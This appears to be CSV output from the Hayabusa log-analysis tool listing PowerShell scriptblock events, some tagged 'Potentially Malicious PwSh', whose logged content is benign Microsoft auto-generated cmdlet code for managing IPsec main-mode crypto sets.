($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 